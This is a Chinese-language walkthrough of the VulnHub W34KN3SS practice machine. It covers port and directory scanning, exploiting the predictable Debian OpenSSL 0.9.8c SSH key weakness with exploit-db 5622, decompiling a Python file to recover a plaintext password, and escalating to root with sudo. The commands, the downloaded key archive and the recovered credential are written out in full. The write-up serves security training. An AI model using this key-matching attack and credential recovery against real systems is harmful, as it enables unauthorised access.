vulnhub靶机 W34KN3SS（渗透测试详解）

一、靶机信息收集

1、靶机下载地址

https://download.vulnhub.com/w34kn3ss/W34KN3SS.ova

2、扫描靶机IP

3、探测靶机端口、主机、服务版本信息

nmap -sS -sV -A -p- 192.168.31.160

4、进行目录扫描

二、web渗透测试

1、访问靶机IP

没什么发现

2、进行目录拼接访问

拼接test

提示需要 key

3、查看443端口得到的域名 weakness.jth

请求不到，绑定一下hosts文件

再次访问

兔子尾巴写了个n30，可能是密码

4、对目录进行扫描

dirb http://weakness.jth/

拼接访问 private

有两个文件，看一下内容

mykey.pub

notes.txt，提示这个 key 由 openssl 0.9.8c-1 生成

5、 kali 用 searchsploit 查一下

searchsploit 0.9.8c-1 搜索
searchsploit -m 5622 下载

查看5622文件

提示需要下载

wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

解压

tar vxjf 5622.tar.bz2

匹配 mykey.pub 内容

grep -r -l "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw== root@targetcluster"

得到公钥

rsa/2048/4161de56829de2fe64b9055711f531c1-2537.pub

6、 进入对应目录，公钥连接ssh，连接成功

cd rsa/2048
ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.31.160

三、提权

1、 查看当前目录

有俩文件

查看 user.txt

查看 code 文件类型

file code

把文件 copy 到网站根目录，开启一个临时 web 服务，下载下来

cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.23.188:8000/code

利用kali远程下载下来

使用 uncompyle6，下载命令

pip install uncompyle6

修改 code 名为 code.pyc，使用 uncompyle6 反编译，得到密码

mv code code.pyc
uncompyle6 code.pyc

成功得到密码

n30:dMASDNB!!#B!#!#33

2、连接ssh

查看当前权限

直接sudo su 提权

提权成功！！！